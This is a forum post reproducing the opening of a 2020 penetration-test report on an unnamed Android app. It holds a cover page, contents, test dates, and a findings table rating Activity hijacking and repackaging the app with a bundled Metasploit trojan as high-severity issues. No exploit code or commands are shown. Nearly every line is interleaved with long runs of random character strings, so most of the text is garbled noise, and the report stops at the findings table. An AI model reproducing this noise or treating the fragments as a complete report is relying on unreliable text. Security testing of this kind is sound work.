找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4606|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
, c% U8 j9 P7 O. A: ?3 o3 M- ?/ n1 M- i7 K) U) \1 `

/ ^- l, @. M O2 j9 H 5 J6 b: ^8 c2 S% n
1 K# I- x, v2 J3 O4 u7 l8 k& X 1 z% D$ R2 C" j9 ]0 ^8 n1 [5 @' y3 q& k

! f% m% U$ N( b% k7 n " {2 n Z$ d& N* ?" G* t! S
2 a( g) I9 C* y+ N4 ?& j " L( v3 H/ `3 t& m. z' T+ s( |

+ n* M% G' b8 R* z5 R) S) b$ c* E; a; {0 L 文档编号:                6 A. b7 z. }$ R3 L/ h; V8 A& A# z! h

, M( d+ j2 L4 C1 O. [ ( I9 k( s4 A5 Y8 Q- g

% h: f9 ~3 Z& Y- U9 D9 r' q ' [. M: d% z3 q: w( @6 X9 w   ( U% q4 g$ p! }! g; f4 N , Q/ T1 m- B' k: C! q3 V

! ]0 j' ?* s! E8 @' ?0 c; |; @ ! T( L' d# v7 P; W

6 U7 \$ z$ o) C, N9 k0 }0 w 0 N1 a4 d% B: I+ ?0 N3 c3 D$ E2 Z) T   7 P6 U$ t: Y5 V1 N6 e, K1 ]4 R$ ^$ |2 ], b

( g) U8 O3 ]% J* Q4 r1 t& u* k/ S

' c- q0 p& @$ S7 N / ^. x. Y6 C4 @! O) ]' }9 N   $ e; X$ y+ G! B, I& C5 w0 ] $ b0 Y# R3 @9 l$ \6 S! n& d

& b) _6 q/ l% H9 L' B% Q( j4 ]) e

, l8 h' d3 O# R! e Y% @) d% r& G: V8 w8 N7 @6 I* ^7 y   7 l0 U7 S* k$ j# j 7 ?1 S* `# S3 e7 h( a/ K2 D3 Y; P

$ G/ Q5 R8 t, }5 m* W* M1 r# ?2 D/ p: O$ o4 J) g& t+ D. F

4 a5 o) O! J- v; J $ T% c1 L7 w7 H @9 t, J3 E   2 ^" z: p- _: b3 a" ]0 t. i 3 V c( n _9 C1 q) O4 g R- n7 t

" H j: ^4 x9 N4 }/ C 9 ~* g2 u5 m4 {0 ]$ h

2 Y' ]" F. ]3 C3 T0 \ F& [& ~5 n. M. N2 O! M9 j 某某某APP渗透测试 - q. G I& @1 R7 A% E9 T+ M; M! u- M* x, S; I8 w/ S

7 `: N0 i, I- m; `! E w' Y, E! e 5 O8 H) E4 o* s: T; t

% ~3 X; z" L3 q$ ?5 W/ q x & C1 w/ B4 z- C5 J   ; m5 \ o- Q' c# p$ V/ a K- ^ ( ^3 ?! k6 y! g3 R

- N( `# D( R1 E1 P ( l/ B; [" s Q# R q3 X/ V

5 \* T0 x6 {7 v8 r$ I; b. I& h# } s: e& \3 q+ W: O4 S9 R   8 i* I! h5 D+ q7 @5 }! [ Q$ W 1 o' h5 q. t" D4 a3 m3 R1 r

$ s1 o( F2 g: V) q; V/ ^3 d8 y " u! M6 ~' a7 ]; w+ d

4 W1 }5 [" x& u& D$ X, A% P 2 t; A1 @, a1 z* {: o   8 P& q% H7 U% j* j) [% h# j9 v0 |. P$ j+ n( k4 Y: @; n

$ n, U' q7 ?& H' Z, A- p . Z4 n J5 k1 V8 S% U1 L* X) C

, x! P: ~7 B# E, K1 g 4 {: r5 D3 a- a: I   * y* c# _6 h. J$ d* M; Z$ H9 v3 J. H% Z' _& F

y+ v; n O! u7 a1 ] 4 ]% L; |- k; n) T# \' z5 M

* N" x$ t: h0 f& ~! F ; S+ g, l- D2 h6 q/ `# B) e8 | 技 术 报 告 w% S G. q5 y, @% ~ 0 Q8 X4 S6 l0 l# w

7 w- l. ]8 O; I% e: u 4 O% {8 `0 g t, {1 w6 R; L& x7 }- f2 P5 l

. w" m& v0 N. {5 [) h7 g2 J/ p 5 t( U" i" P5 l. ^+ g9 q   3 p2 Y B: d% Z, |, ]1 D, n; {( v4 P: Q 9 M2 {& H& \! l1 m/ v1 J4 \& W

9 O4 h" Z% z+ k1 t# x/ x ( F. t$ I, H5 {9 r

3 M& u7 Z4 J( S+ T( ~5 G3 E9 Z* P 9 ]2 M; a. H4 ~# ?7 o   $ K: Z) @7 F6 |. A7 P. n1 I/ Z* P5 D% t( Q! e) ^

- Q) a/ x+ z0 }0 Q' D , `5 h) r/ p6 b/ N( W0 H

7 Y. d9 r: P+ v- R W ; R2 G @8 S7 j& D1 r   & q( B$ L* h+ `# h% I 0 W. |" X, T, c- X5 H% q

, H( {( ]3 L( y 4 X9 b. P0 Q$ }5 O

! f# z4 H! T% G; _; X ; E9 L; n4 P1 x   ! l' }6 W2 ~% b- N 5 F# [9 |$ X& Q. u2 u2 K2 v. N

( d; V' n* o% e n; i, k# |' y- w/ d9 G6 J' o6 N. Y$ @0 L$ t- o, e

; ?& b- i9 R: K s- G. Q2 z6 g& I7 a( U9 N   I! u/ Z. f" n7 T 8 n2 ~8 c- N; Y( M2 y# O: g

' K0 ]" K/ m6 k! O" }: X 5 J! L: k6 V! \ W$ S2 ]: ]0 }4 S

# a! I" g' s& i8 g A/ K) w* J% r# K& r2 j   ! P7 \( B A4 d5 a " `8 }. S, c. W& K

0 @& j6 x" e" h9 Y* f9 \3 V 9 w- v6 k& O; F4 |% H# g. h4 Q

$ ? S7 Y+ ~; e1 }# o- }8 T; q+ ^* ~ # Q+ N" q$ a. W+ Q+ T+ ]   4 F0 n5 r7 r- I/ l , W5 x' E- ^# f7 E' b* A+ [

# P4 y# m6 n& d/ i8 [ 2 T0 c8 U, q# |

9 h3 B, k) {: [5 ^$ l$ d+ H 5 y. U) n( {" E   / K/ `9 k' D- M& ` B! \+ K " ]3 c( A! b3 C* V

5 K, c. T' m: o3 ? & B; g3 |! J; M

3 M- l* T; ?- x: q! \: K ; n/ ]/ N5 T2 _   + w& W- P! h' e1 W' q1 \/ q( v; P3 ~7 v+ g 1 e/ x8 N* R b- W5 F. m" A7 a

; Q7 |: |; f/ m. q' ^. o" d# K 3 }6 h3 E! [& F+ |

9 u$ Z+ m& K" `0 v ; M4 [0 P: O. D/ c: g   1 D) _$ r, @' ]) U8 f 2 x, x! a( N8 N% B5 x7 Z

# L. d( K$ I, ^4 N4 l: O2 i3 n! w h' q3 z( {

0 ]/ A7 M, B3 l5 P0 n) o6 ?& R) L: A S- T& e+ R4 o3 L   " Y' q# b0 Y. G0 V' t9 E + w; _* K0 Y' s

; b' ^4 Y$ M' ~ }, ?# e4 y6 R4 F$ O) O& E0 N

, d6 o, V; n6 ~) ]% X6 Y: e: B $ ^& o7 l+ y2 L) h4 F   " S' z# _& W. o' z9 G0 p9 G: Z2 p4 ?

/ H5 i" h+ O7 k% N * ]: ?" d9 x7 F) \4 Y g, q

* \) Q0 z, n& ]# j/ H4 |( K9 c8 g* h 3 n: ~9 I, `: U) C+ p1 w* J+ [" ?   / s! @2 O4 I8 ], ~& l7 R% E. s/ d) R0 g

* U- A: o) T# f" \ 2 E: f6 A, t' l9 ]6 H8 P5 z) P# A {

3 ~. T9 C+ E. K9 \" o+ T * ^4 w; f( b1 i9 [& M1 G9 V2 E   1 `- }' {4 t4 A. {$ n . f+ S( i8 T+ c. M

' u. _5 Y4 |0 t9 _, x5 x! D3 a8 |& h- ?) c

# R' U8 L' {8 Q k* P9 [ - v( ]1 Y% l g7 Z! `5 ^+ u ~5 }   5 Y" K& W% N% y/ v5 N( {- m9 `; ?" V, i- v& ]

# E T$ l; S' F8 e" Z/ i$ R* ?* V; c1 N& ^

0 b" g( l# u" y- z* x0 t# g# I$ K0 |: j5 o& R4 Z2 J   ( @* ~* m* L; n; T- W; V( U 7 X" q+ U, Z8 Y5 I

7 ~5 B0 Q: U9 f5 E8 Q' k, _( D , W2 A7 r: B2 v0 @; Q

6 w: f) Y$ w7 o' V c% A) [3 ^4 k, G 1 Q' b- ], G8 |8 d% ?/ {   l* u6 Q. h+ ~( u8 T/ @3 l. M% G& i& i+ z

# I$ s1 }' J0 g; e2 {; q% ^1 y$ l. E+ u# Q! v r! I3 h5 v

/ k+ \- c5 Z- d0 [+ q8 g" } - o; d9 ?9 V1 z+ [; I8 R, y   ' C. F. ~) s- ~ # _; B( F- b1 [% x6 D7 y

- p* \; J/ `4 C) z" W# p2 m. ^2 Z, i1 }

$ D" c0 X/ N2 \3 l* m6 L 9 T, i) }0 ]4 m' g: E) f# \% | 二〇二〇年 # R$ X! M" B ]/ t( D4 G' e & z+ ?9 o. q- ~6 t3 Q3 X

' J+ V7 h. H9 L8 F. t6 F& T0 g8 `. h! }: r8 p1 \! j7 R7 b
* ^* j* V; m# m2 {4 t2 l4 \. p) W# F) | H3 J$ G; U1 i4 m3 G
' v; _2 d, E6 d: V' j! `8 k- ]- C; J4 f; o" ^- A
$ s' a& @2 y* k( ] & I1 z$ A7 V0 P7 F Y
) r7 B! [: ]& l+ l1 }5 d/ @5 v 5 s& r* H/ y* b e
, |6 X1 ?) m% w7 ]: |& g% @ ; c- p1 \% |2 w8 C% H; B/ {
$ {5 p: x* q- ~1 f 3 Q1 H; `! M! }; `9 Q
. `, a6 J0 a8 K. c: y) e, a: n+ G( h# V4 Z! M0 {0 x% Z5 {
) R- u; ]/ M! c6 n; X4 q6 f5 A9 n B4 j

. K3 K* ?' p" U+ ~" v4 }: L9 i 8 a* h8 g% S7 m' f! w 目 录 # U$ ?$ r, R7 L( g- F8 {3 s3 P- B

0 d# G% O& N: o9 {$ T% A7 y( s! p) G/ f4 S. Z5 ~ ' S& _# t0 G* A# ]1 c1 k. n# K ' }- B! U* ~+ @8 c6 Q& w

( r; I3 _0 B. D/ q! q# v7 {0 F 2 ?0 y" O ^# K! L   ; X) S( B& U. X2 ?' ^' S' N1 { 4 q! }; `( M0 Z: v9 _6 c; g

/ M& `- h1 J6 D. _, M) b# A# G0 u 9 j8 f t2 a3 `" ~7 A. s2 |

6 }+ y n0 s* D' r+ r( k! L1 _2 [: t3 H: ^& g! y3 B# U( ? 1 概述... 3 5 \' [, r6 T8 Q8 x) V" q6 w5 M' `0 U 7 r. D2 N7 `" B$ } U# M; P

5 ?0 X0 @8 {/ \& \0 i! B * ~5 y5 S) w4 f" {) S

: u! N9 P/ ^. H5 D' h 0 X7 Y) m6 O. z1 f: b# p 1.2测试时间... 3 9 g$ M- C8 d! ^$ h8 f& v( f3 w9 ~ $ @+ Q' j! R/ Z# e" h$ w

: b! R, [& o& e* J - Y8 w' @9 Z& _

* `- \, l L! k' z" ^6 c* g" } 6 b+ j. P9 L) D# ?0 p7 @ 1.3测试对象... 3 0 X- g" W5 t- ^) {. ~ ) G0 C" k: ]# t u8 e8 Z3 k' R7 x

/ l% x W2 S( b# _ # U6 a: ~3 t* @2 V; `3 ~; ]

* N5 I5 N9 k- h7 \ . |, L7 ]# _2 E; m 1.4测试结果... 3 ' J& n/ s* m6 B6 Z( n& w 2 c, t2 Q' U& R

( L1 `8 R n) D1 C! A: e; o/ p8 x* M5 K

+ C+ Y9 S: {' C + ~3 j! g+ g# P. k$ r 2 检测结果... 4 $ h8 t& o" D, m5 g m6 g$ _( I) \' E' h! M6 r8 D2 n

0 }* ~! C/ h4 V/ Q7 _7 S1 T0 Y2 O/ H' y% n9 K

: w5 X M9 g' |0 r1 N 7 t' t& m# |& V: i7 V- G' E 2.1 某某某... 4 ( V) X* v& B5 r ' T d w( I8 ^- u9 r

# R! H$ n% J2 `5 \7 P8 u& j0 H! \" o

3 {, O$ k; D7 n: T: \% l( X; H% u } + D% p/ {# e+ \$ ? 2.1.1检测目标... 4 2 o& m$ z* q, \) F% r+ C% u1 v, y; v / a K" k V1 l m* @! t

" T& J' j' ]( z" E/ r; l* I : y) U5 Z/ w1 D- C+ t8 p7 ?

2 _- b( S7 t- m) N6 i , K+ A7 w* S' A5 a( K" X3 v 2.1.2检测结果... 4 & S- {, I! r$ c: S0 c # K; m$ w4 A+ ~3 E- W

& K/ v' J7 V, p3 X7 ?6 t! i 8 o& h; Q* b0 R

6 `6 w% h4 e' i% @0 q$ {3 `) u 7 A* G, K8 Y0 y4 a: y 2.1.2.1. 4 ! K" P& ]0 ^; U" W1 w! c6 e% ]2 ?4 T # [6 X% h! p3 r8 C% S' {

4 B2 X( @$ w+ h0 n4 ] ' D' ~* E$ L2 z

N" j/ t3 }% K( ]* j0 x4 M6 n# m5 B0 r3 E" A* O3 Q- N 2.1.2.2. 6 : P8 W. x( Q4 @& n/ h1 k # @( x1 O- `1 g0 A% p

8 p# D6 |+ b3 A+ p1 o R D" q1 p K7 |3 Q" s8 [; ?

" b; z' N6 x# s, ^% Z 1 {( ]) N; |3 K; S' C& W 3 A4 e( p1 j! m6 T! k9 s1 }2 k8 l3 I* {; l, `

, N4 w/ Q- H- h% C2 Q # N7 c( H" ]1 G# G. M( T
7 L7 T& L+ ]; E# v( j# Z# X : Y8 S9 G \; x
% D- J& x2 |+ N* B* o( }, X0 c6 A $ D* U% Q; ^( ]6 r6 w L
! i- q9 C9 d. V! w7 A* A1 v: w' h7 c/ L& _5 K$ A! g' m
* R5 u |; y" G+ h) A+ D, ]( c $ X0 N4 [' g% ^" x& D' P8 [+ z- W

7 W7 D. J, C5 U; t% K/ i+ x7 m# h) m1 ` 1 概述 5 u4 l8 \$ p/ ^% n7 e/ K$ k1 O- G/ ]9 c6 D, m0 S% t1 a2 s

7 x) z$ E3 k/ U7 x' J+ o 6 @0 ^3 Y1 C* V6 _2 Q

. Q$ W' ^9 F& U. Y s, d e7 ] Y: I7 j2 r, f 1.2测试时间 $ d' x2 _5 a/ m1 ?1 O 1 T0 D& B" O# a0 T7 ?0 s, r3 c1 W4 ?

9 d: p5 p* t+ K1 e; P + C; i, R3 ^( A- E9 t6 k. ? 0 @; d8 Y7 z% B0 f$ W6 {1 r1 w' e- N$ u) L, G4 W3 y3 m& g" B3 P$ x7 g# O% G1 V" c, V4 b: A9 r- h- N% a. f5 M$ s0 z6 z/ e( y) m, r8 F% z5 a: B2 p- _: n! G) j; ^9 d" K# X' r2 Z2 G h. D: g$ c Y5 l; U6 D* v1 f N# ~ f, J1 |0 e% @) C, @0 k, F j- c8 B4 x# E4 m M1 J3 G3 u! l: v% \0 ^( m$ I! D" M/ a" V2 s q' D9 W( t, z6 k0 o! O4 q/ M# d/ t7 k }# I, X" P( I, y S6 @) h6 ?& l* [: S# W- `& v2 a1 j7 L, I, H, ~9 K9 p; m* L' T7 I1 `- W4 p7 U; m, D8 g! X$ l6 C4 g9 n: C6 @6 E9 u+ ^1 A _9 G5 ]# x- @( R9 a" u% z" w) [2 E- H& m2 ~% D' T* _/ \+ Y: A# Y( p. l! J, G. D: m3 ?+ R) ~8 u9 y6 C3 O# ]& h! N+ J( V$ o4 q# U1 T$ S' D, q7 c" ^. `# Y" h' y- W$ p }+ u n, t1 N1 L! m& } r2 e7 T; J
) r, R& n* ?( ^7 x & p" X# c9 B# p: ^* M& B

8 D0 _$ A" ^6 l4 h5 ^; j" g 7 I9 `$ y! O% ] h7 t/ B 渗透测试时间 : u6 R9 c" K: `/ u# ]) r2 \) Y* `

; p3 ^! {* ^. { 3 ?. K' A1 r$ a, a5 }
- c3 ]+ [1 ~( g! @ & [/ T# c. K- g( q# D* j6 |, b9 w

- {( s+ J9 K" X* L3 Y ' x& G T: l2 a# Y 起始时间 - W6 _$ X( F: K2 R 6 T6 v4 K3 l9 h" S1 @

( @! ^- M4 [2 V& x3 i % b8 L- O. l# l R' B& E
3 K- q3 h5 h$ t0 K' V% |! @6 |, l" r

* _& [, Z$ n6 G5 {- c) x+ H2 V 2 N- c5 L; h9 G3 \. e, G 2020年4月6日 6 k- Q! X; M; X4 ]5 h F$ |8 J+ a: E

8 u$ u* z2 D$ g1 P! W$ i) d& e& U 2 l+ O1 W" `2 s! }4 G
& S- k1 ^/ V4 l2 h: H $ f9 R% \# B9 Z2 x1 u) Z

$ a* [7 j, {! o1 x # J0 D$ z; D, l3 P7 H, G5 }- { 结束时间 & E; o7 L: m7 E$ U9 X: r+ v" R& S9 A- h0 \+ }+ m

3 C# e& E' k/ Q7 P" `+ d! l& c( F" |% i$ m ]
( ^; ~8 I4 A: A, I , ^' i( y+ d" ^2 P8 F$ W% e3 F

) {* F8 [, g( D$ D6 u' d ! c4 n- D9 ^ d) C4 }/ n 2020年4月9日 * n/ l4 a/ |4 h8 G$ Z/ K 3 p* k) R: v, [' H0 y8 r; @

$ ?2 r& ?% x6 U% M/ | ! e/ r( h. P( [( p, Z E* F
1 q+ L/ s1 Z* m E6 s / I W) P- ]7 `% o a+ n$ c: y

1 x' Z+ k3 d+ t+ M ' _' D. Q- R; X1 J1 H& l9 T 1.3测试对象 y+ P6 s I7 I 8 C$ v8 W$ J. q7 N5 s# ]

7 I" y: O& R% b . G; n9 Z" V% p5 i' m1 {! F

w" `* J% h- Y, C; f- Y 4 Z% I$ g" p- G6 `% v0 J( p/ s; C* u 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: - Y& t* R! @9 d! H( Z 3 d/ ~0 M. x. t/ ]8 i+ u

1 j$ A% D( [' m1 Q5 p ; Q: n9 O0 I2 D0 _8 N" @" \

; v }- P, y6 e- y2 d / K0 S) R+ `5 k( {" i+ W( }; i- n2 m 表1-1 检测对象 . Y. i+ E, u; u1 a% n 2 _) p9 u6 X, I

( ?5 Y* B$ |, Z) f. q7 | 9 ^. K. z1 N* p5 B3 w6 N7 K9 B 1 q( d# \5 [- @3 D% E8 Z N b( I1 s$ r% t2 q+ ^" _" `% }' F" ]/ k+ _! j2 k2 s. M1 n2 J* p k& p+ ^5 u( A: m: T! m8 |2 f$ Q; b* z: i8 o6 I! {8 k0 S3 @- l7 B7 ^4 q: y% D% U" ?5 b5 ? r" w7 K% I- ^9 X# a: y, I, E$ ]/ D( p: [/ c$ W- T" S& U- l4 [- D6 k# W0 c5 v4 n( e& Y# @" m/ a) Q- @6 Z! ?( Q; {" ^: b! R7 U& m- I# N7 \ r2 s6 [1 W9 p# L a1 B8 R) r! j) H% \9 o# |0 j+ `7 Q- q/ R/ u# l n, ^$ E( l9 k: L1 n/ R5 k1 s( C/ `! j2 ^" H9 c/ ^/ M% m- a* r/ @% C/ z) ?# N9 L2 f# z# p, M, M* k6 Z% \" {6 p- a$ _. ?1 \% U, _9 i) V/ z5 n: Z/ ]" v" ]) {4 @. P) X( N% P) I8 l; s- {; d2 A8 @5 M9 Y) m" {% c4 |" [" G5 }/ B6 n; d" q H0 b1 x5 n+ `# E4 K8 y) |1 K& u+ g O0 }4 d3 C* v U1 L9 ^8 b6 N1 W, t$ }3 ]: F- c- @
5 Q$ r& R0 S4 X5 I' v) a) c. V. _ % I) B. D; o' O7 ^1 C- D

" j7 U* g) u+ E' z* [( t ! O4 n& Y8 r5 J4 |& v0 e 序号 ) @/ C' e. ]8 Q4 r/ E1 J4 `8 e. H5 f/ D* r2 Z

! \4 M- ~% Q) s6 N . s) y) T* W4 h& N8 j+ c8 @ b
2 i, _( u9 A. @9 Y & r% g% l$ s, ]5 e7 Y9 L

; Y, [5 B7 [, _: ?$ S + X, i! j' f: N, C, N: I3 F3 H! u! j 测试对象 J4 h! f" g O7 | ; ~2 ]' @/ o2 ^. f1 M3 V

: u4 M( b% Y* L! C& j4 e& n / ?6 M) v6 M( U
$ `: p3 M9 x1 J5 t) X $ ~# O* K$ Z$ X+ @, U; _7 O7 h

7 j" O. {: P" d. b: j/ D2 u 8 j8 R7 e: @# A" y ] 测试地址 ' G5 O7 C9 u' c N' [6 t- q) I0 ~% ~% @$ V4 s5 }$ H( @- C- d$ O) X

1 g' A" M' H% \5 e0 {7 v5 \ $ D; e! z, G9 x. H* e) f
( R! u* w! ]) }/ I( i) r- h" F - b* h u! w3 {4 \) ]8 Q

. S6 P% u- G2 P 2 D7 X, x1 g2 F0 J) h2 ` 安全漏洞 0 t, r. f% ?, n* @( }1 U ) a3 `/ }- a: Q( d: `

5 m0 c6 n+ `% ~; M( ?2 Q + Q p6 r4 e2 U+ B/ Z! M+ e% i1 O
d7 d; v4 K. Y5 L+ [* k' M, O2 n5 c8 T

" m1 G: ~% z# c* S ; F, a' K$ X, z5 M3 Q4 w 1 : ^. Y2 _. I" | % r6 z( y* C, d

. T! T; u: p- [) L " b7 S( Y# Y+ w2 q: G, G
0 D8 D5 _) v! V$ s0 N1 D 1 W9 g$ W' ?7 `; z4 C6 ~

1 G. J( t6 k7 E @, I$ S) O0 y. q( }1 g- z2 C, X9 }# w" J 某某某安卓APP * j* s! n" r; t$ e7 n4 [* u" _* @" r2 p& D L, Q

2 N3 H0 |$ z7 _5 y- w; _& |/ ]0 Z. M" ~* A, ?& M, t
- ~6 z; p: G* z1 f& o0 v, T5 k & r1 ?0 \* Q- J- m7 ]

5 W( [ x9 {/ @: X. @: U8 X- ^0 V3 Q+ m& X   ( J/ D/ r3 o" l! r s( ~ z2 A/ q5 C6 d1 ?! R5 J, C0 V

% ]0 f- ~2 ^5 B3 d: _% ^2 U 3 b f. P$ i( [
! Y+ W$ w! e0 a$ C2 E1 @9 b# c2 d) p/ Q# L' h. A3 k' R

4 @" S, ` o9 y; G . x+ I7 ^ v6 |6 Y9 L. z 2 % E$ b" {+ m5 m1 E, c7 e3 b . X1 M# Y( B0 j$ A p0 C

5 f# e) h% j2 F# \5 ^# l) a: Y' l* p. m1 k7 G
1 `8 ~3 P* s! s* t+ G2 x4 X& S7 \: C9 e # Y; K% X9 }& D$ X" H

7 k/ d$ j9 F6 Z! ^5 M" @/ c% k1 z+ j# H4 y% k4 h- @! N _; z 1.4测试结果 # q: \0 p. o' ~' Q* J- a) B : t. I* Q2 X2 z. T+ E+ B2 G' Z

" y6 Y% P9 Q- M. C) ?* l / ~' _* B. y; K$ m e- d5 e

& m% X1 Z/ ~1 c) A$ W% ^/ Q r5 d0 P* h5 o) U" J! Q3 T8 G+ q 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 5 v" T. }7 ^2 ^* T! t4 O8 U; R 2 f, m) I& U0 o! f& t) }1 j! w

2 {: c- h. V8 U! A& Z 7 J& h4 c2 @6 x8 j2 L

& I W1 a3 _2 b: J ' k# L" u+ \- f" T1 E! s   $ W" l$ u. c3 ?/ }9 e/ S5 E; Q* ` % i2 F& q7 D5 A& J3 ~

( k8 ~+ J8 y9 O, }1 } 9 f4 c9 e, o* F2 T+ V2 I$ b
% _: c+ E) `- D% x4 @ & m# q F* @% D% d9 Q 9 E8 m2 B+ P( x+ s( S8 z# l& Y$ f0 ^. a4 y, F: V5 \4 @0 k4 j% U, U3 c. x7 t* z9 a) Y, l( }/ T# a/ A4 G# U; p+ r: \6 s: c0 Y U: j2 J( e9 m- g" X/ c, }5 p. g. L3 E: b* f: U8 Q5 G) q/ E- o0 a. |$ n) W; L- ]( ]" {2 S7 J7 z; X! D) S3 T( _, v# Y4 G7 }6 k2 h5 Y- |4 j0 u) z1 V; a. n" n- t/ Y8 a9 ]& F& i' b/ w$ R( Z0 _8 X- v( @, ^" N' [* O6 T5 u7 \ c4 a/ e" g( M& i' [3 P' f' G7 b7 |1 @" q1 r; b8 Q4 N+ F9 x5 d, W2 L# P) \6 t; a1 ]5 I# g, v, ~- }; T) |+ N) u% @( K2 c) V! y7 X. \' p0 o, o6 ]) o7 m7 [( e* o% v, C( N7 f- A0 b) {6 L$ x0 `, ?0 v1 R# E% q, p# J+ X3 W/ O. Y$ a" w) h: i( u7 C; B/ D& y2 M( B/ T q# t. v( G! S* H' b Y% N+ y( }. L6 L7 u" _' a& Q5 P' V; c% f) `8 u2 Z! T9 J0 w- i/ d, i6 [2 J: y9 l0 k3 U: O M/ ?( z0 t$ Q- D: ]+ V7 \. v) j3 ^( r" G: j! B6 n8 M; e+ u; I# `# P( L; p- W4 c: j5 |( K, b$ J/ J- D( C% b$ E* A3 g0 }. r$ K& h8 u& V6 x p/ D4 o1 Y1 B+ T9 M+ E- o9 B$ R( x8 r b; \ b2 p' B. U5 R* {6 W h2 L5 \7 P8 L& ?+ l: ^1 q3 _5 O" d1 t4 T9 j4 b% k# i1 d) L( Z% C7 i% ^2 N4 J" }/ y" a L4 `# B+ p! j3 H' y+ c' Z# X1 Q5 Z7 O0 W9 e1 @ X3 d; j0 u/ x L# d( G2 A3 F& L+ a8 z- c1 l, x5 ~& i5 O3 L# `# }0 y) e& A; i3 q2 f) Z. t+ B$ p" e8 X0 f* n% p3 k- z6 g F4 Z s+ ?5 v6 T, C$ W- w% q8 R" `! K; v* V+ W( p& e7 A. H- I! S1 z
+ U) N, N5 {4 t 7 W1 ]8 ~& s3 w! _% ~5 {# ^1 O

" V1 Y2 w6 e! G# {9 ^ $ v1 g" n; ]0 Q- ~ 序号 ; i- O2 D2 I( K& B- |+ R* J& z 5 |' I, X: Y' F! }# N, x

+ S! ^% E8 C' p4 k s4 K& u9 j3 {0 A. y
$ J2 @8 @2 e+ C, L6 e- j ( {" N0 Z2 Y5 `$ s; A) m3 Z

1 ~; [6 \9 {; {& i2 p . b3 P1 x. m; j7 M 系统名称 " ~8 A) m8 r4 \( ? W4 y ; {) N$ b0 H3 |) n2 ~( H& [

* s% F( U+ v# C( w 8 H7 y) L3 W# J# T. l# h1 J3 `+ \
% l7 @* A# {! O! l% `, ]8 ]' O( O

+ ~- k2 k: s7 H) R- g$ `+ F& W / Y& {. \0 o5 b, R# P, d 漏洞名称 . Z7 y0 o3 m) N" m& d) z( T5 E" _8 \& `7 }3 J

' u: j; x2 V. ?9 l8 m 2 l6 l9 h2 t3 A! X F" [2 K* {
# |$ P/ ~) Z9 ^" i2 c* r 1 i1 I: d4 J# N+ }; J8 m3 ~

" Q- n/ h0 Y1 ` & N6 I. Z9 f7 O1 K 漏洞危害 # e& q8 }8 e" V9 ~ L4 w2 K- V+ z8 J" I6 k7 ~1 C

+ j2 w+ C8 G N# _! x ' T* x8 Y! g' y/ p5 f8 U4 D( o
5 n! p4 G/ l; a3 n" w: _) b, o, m, d6 p8 W9 H( j* e6 |: f1 o/ q

4 `/ A3 c; q. k3 E: _, k' p% x9 r* [% `& S 修复结果 ( D, ]0 \8 B( P$ m6 s 7 H9 Y& J9 `+ Q- Y1 J! ~" j* q O

+ i5 N! N Z) D- }$ S8 C! d6 J, r m& O% Y- d6 q9 W& k
; m: _$ r) ~! D: p! a. z1 P x5 }! J7 p1 [; R6 b/ P- p

- y+ o% p. \& N% c& Q 0 z! o0 E8 \4 }5 u 1 8 q$ a; n: L2 C1 @+ W& \) X: M5 r# Y' _: ^ ]7 H2 U

$ J) z( K% _( \1 e7 r$ o # s/ X4 m% d, o# e
; \2 M/ n4 s) ~" M0 e6 E: r) R; u/ e) w % U9 x7 Y0 E5 D: w% ^* j

! t' | o1 [$ i* J7 |5 B1 D0 y 6 ?5 |7 K( |$ c3 w' _ 某某某某某某APP . D0 k& V# k! Z7 @& l" i$ g Y7 c7 S/ k$ z9 [2 Q

: o3 B p" d/ D: @0 N2 Q $ g4 g ]6 O/ g8 E$ z( I% e d& u
% H/ K* J/ S. @ ( _6 \& ?3 |( U" J% Z$ ? Z

2 e* o3 y" g3 S i3 F n3 w * Y7 f' m' Y( I% A# H Activity 劫持 # K" V9 D' X# `( e8 [' u5 F' Z% a. L5 k# Z" M% [% Z

* D- W" D7 i/ g. K5 D5 g6 S; ^ # v: |5 u2 F2 W

" I$ b; y I/ X: T$ S+ S2 C7 Z ( \5 c7 p6 i) h4 E) F   / o _" P s. U* `! Q& x5 y1 W9 q# [$ r0 z! i- h

& w4 w" a- Z2 j. o& n 9 Y6 h8 S4 R: e2 w! f
9 C& N9 i- P0 q3 |% A . C( t G) b |9 A

# V' m& n9 K2 i% x: I7 u/ x' |# P . i1 R/ G6 {( l 高 4 s- W; I6 Q' x ( ^: x; y7 N# \0 X8 ]: O9 W7 O( O

3 C) `/ K4 b! i& k6 L 3 X7 B8 {7 T* C, o. p
! E5 H- y3 }! M1 @) g & j$ ]7 J' j& v3 @

0 n. P% z L" ^: d( D8 B7 l, h9 F3 k" [! J6 `. a3 C   % L2 d' _0 x3 @+ v. U! I % o0 c: c& d0 A* ?4 ]6 X# `

, T' e5 B9 X$ y; w, W( d; c9 z $ f" L5 ` |, T
G7 N% V/ x& v* t% X0 q2 j+ l& V $ V$ g) H3 o4 |! }8 F" O

% g# a) A; V: [, E* W: d( t" b 1 s( b, y! m6 d b( t/ v2 { 2 % j/ d, v) d5 p* O * m' ?: A/ b5 [& ^) h9 O

' c% u# E! _- F' g3 E# E& p. J/ p6 D" D( L- ]1 s
( o! i) y' z+ k0 H& M8 g2 e; e" w$ t 8 O6 q( F- P, z7 J# W9 m; |8 }

# V+ s# K- K' M0 p8 F- ` + ~+ y2 u4 [: D) t% l1 R 某某某某某某APP 3 ]4 D3 [4 ^5 k5 ]# i7 ^ ) l! q- ~8 ]1 h: d+ A( L

( c {% h# Q# g" A# W/ x$ H0 O* `: r% j5 @! O2 k l9 a7 B
8 T( x/ B& l5 ?" J$ r$ m% ]3 Z% ?9 q: U) {

% w% I, Y# f/ i 5 p3 ]2 m# [0 v& M 反编译二次打包捆绑木马、篡改APP代码 : ?3 l" o; @1 L7 I; V! W! {7 L& y1 O4 S4 K/ q

; j4 s: z; K7 }" r- S% _3 W* R Y 1 l* f+ m u7 Q
7 @7 {: j# q9 Q c0 I# i$ e D ; S# m- U# s' v9 P

9 [6 \- V/ \* i1 J7 u6 ~ 0 D' B1 o7 o: \+ ? 高 & ^9 m I8 d0 H 7 i' Y" G+ l( y' U

2 V% ?7 ~% p" g1 a. _2 Q& {1 j- t 1 ^0 g3 l3 F( N* z+ _5 ^, O
